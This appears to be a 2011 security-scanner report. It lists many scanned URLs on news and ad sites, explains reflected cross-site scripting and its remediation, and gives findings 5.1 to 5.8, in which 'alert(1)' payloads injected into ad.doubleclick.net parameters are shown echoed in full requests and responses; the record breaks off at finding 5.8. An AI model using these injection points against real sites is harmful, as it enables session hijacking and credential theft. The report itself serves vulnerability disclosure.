http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/google [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/internet [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/ipad [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/iphone [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/itunes [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/microsoft [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/motion-controls [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/online-privacy [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/science [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/social-media [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/twitter [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/verizon-wireless [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/viral [name of an arbitrarily supplied request parameter]
http://technolog.msnbc.redacted/windows-phone-7 [name of an arbitrarily supplied request parameter]
http://technolog2.newsvine.com/ [name of an arbitrarily supplied request parameter]
http://thelastword.msnbc.redacted/ [name of an arbitrarily supplied request parameter]
http://thelastword.msnbc.redacted/_vine/printer [path parameter]
http://toddkenreck.newsvine.com/ [name of an arbitrarily supplied request parameter]
http://redcated/APM/iview/139941180/direct [;wi.728;hi.90/01?click parameter]
http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter]
http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]
http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]
http://redcated/APM/iview/148848786/direct [REST URL parameter 4]
http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter]
http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter]
http://redcated/BEL/iview/262582811/direct [name of an arbitrarily supplied request parameter]
http://redcated/CNT/iview/286609711/direct [REST URL parameter 4]
http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]
http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]
http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]
http://redcated/CNT/iview/286609711/direct [wi.300;hi.250/direct/01/181503410?click parameter]
http://redcated/CNT/iview/286609711/direct [wi.300;hi.250/direct/01/181503410?click parameter]
http://redcated/CNT/iview/287065754/direct [REST URL parameter 4]
http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]
http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]
http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]
http://redcated/CNT/iview/287065754/direct [pc.106032482;wi.160;hi.600/01?click parameter]
http://redcated/CNT/iview/287065754/direct [pc.106032482;wi.160;hi.600/01?click parameter]
http://redcated/CNT/iview/299297287/direct [name of an arbitrarily supplied request parameter]
http://redcated/DEN/jview/286026710/direct [REST URL parameter 4]
http://redcated/DEN/jview/286026710/direct [click parameter]
http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter]
http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter]
http://redcated/NYC/iview/264935949/direct [;wi.300;hi.250/01?click parameter]
http://redcated/NYC/iview/264935949/direct [;wi.300;hi.250/01?click parameter]
http://redcated/NYC/iview/264935949/direct [REST URL parameter 4]
http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]
http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]
http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]
http://redcated/PTR/jview/240321567/direct [wi.1;hi.1/01?relocate parameter]
http://redcated/ULA/iview/296652509/direct [/01?click parameter]
http://redcated/ULA/iview/296652509/direct [/01?click parameter]
http://redcated/ULA/iview/296652509/direct [REST URL parameter 4]
http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]
http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]
http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]
http://wbenedetti.newsvine.com/ [name of an arbitrarily supplied request parameter]
http://www.bing.com/local/ypdefault.aspx [REST URL parameter 2]
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]
http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]
http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]
http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]
http://www.co2stats.com/propres.php [name of an arbitrarily supplied request parameter]
http://www.co2stats.com/propres.php [s parameter]
http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [REST URL parameter 4]
http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [name of an arbitrarily supplied request parameter]
http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 1]
http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 2]
http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 3]
http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 4]
http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 1]
http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 2]
http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 3]
http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 4]
http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 5]
http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 1]
http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 2]
http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 3]
http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 4]
http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]
http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]
http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]
http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]
http://www.foxsportsarizona.com/favicon.ico [REST URL parameter 1]
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [REST URL parameter 6]
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [blockID parameter]
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [feedID parameter]
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml [name of an arbitrarily supplied request parameter]
http://www.linkedin.com/cws/share-count [url parameter]
http://www.neudesicmediagroup.com/Advertising.aspx [site parameter]
https://www.newsvine.com/_nv/accounts/login [name of an arbitrarily supplied request parameter]
http://www.polls.newsvine.com/_vine/printer [path parameter]
http://www.reimage.com/includes/router_land.php [banner parameter]
http://www.reimage.com/includes/router_land.php [name of an arbitrarily supplied request parameter]
http://www.reimage.com/includes/router_land.php [tracking parameter]
http://www.scientificamerican.com/blog/observations/ [name of an arbitrarily supplied request parameter]
http://www.scout.com/a.z [blipid parameter]
http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]
http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]
http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]
http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]
http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]
http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]
http://msn.whitepages.com/ [Referer HTTP header]
http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header]
http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header]
http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]
http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [ZEDOIDA cookie]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]
http://redacted/home.asp [name of an arbitrarily supplied request parameter]
http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]
http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]
http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js [ruid cookie]
http://s18.sitemeter.com/js/counter.asp [IP cookie]
http://s18.sitemeter.com/js/counter.js [IP cookie]
http://redcated/PTR/jview/240321567/direct [AA002 cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

5.1. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b670c"-alert(1)-"6e98b65d01c was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870b670c"-alert(1)-"6e98b65d01c&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
dn.net/2426847/1-Branding_Film_300x250_V2.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870b670c"-alert(1)-"6e98b65d01c&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/2
...[SNIP]...

5.2. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b87f"-alert(1)-"c630857e2e5 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=3048269105b87f"-alert(1)-"c630857e2e5&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
0_V2.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=3048269105b87f"-alert(1)-"c630857e2e5&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 601ea"-alert(1)-"ea0886cce92 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5601ea"-alert(1)-"ea0886cce92&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:41:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5959

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
"250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5601ea"-alert(1)-"ea0886cce92&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/u%3B234278507%3B0-0%3B0%3B58143061%3B4307-300/250%3B39992639/40010426/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e47"-alert(1)-"5c12fb84d15 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR27e47"-alert(1)-"5c12fb84d15&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:41:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...

minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR27e47"-alert(1)-"5c12fb84d15&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38375"-alert(1)-"118ab6f547d was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=2062499238375"-alert(1)-"118ab6f547d&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
g_Film_300x250_V2.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=2062499238375"-alert(1)-"118ab6f547d&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1
...[SNIP]...

5.6. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0dca"-alert(1)-"d645eab062b was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=Ge0dca"-alert(1)-"d645eab062b&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:40:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
/2426847/1-Branding_Film_300x250_V2.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=Ge0dca"-alert(1)-"d645eab062b&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B4
...[SNIP]...

5.7. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257da"-alert(1)-"516683e8192 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=257da"-alert(1)-"516683e8192 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5961
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:41:45 GMT
Expires: Sun, 30 Jan 2011 01:41:45 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
= escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=257da"-alert(1)-"516683e8192http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/db/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.co
...[SNIP]...

5.8. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac034"-alert(1)-"a5858b7aca9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

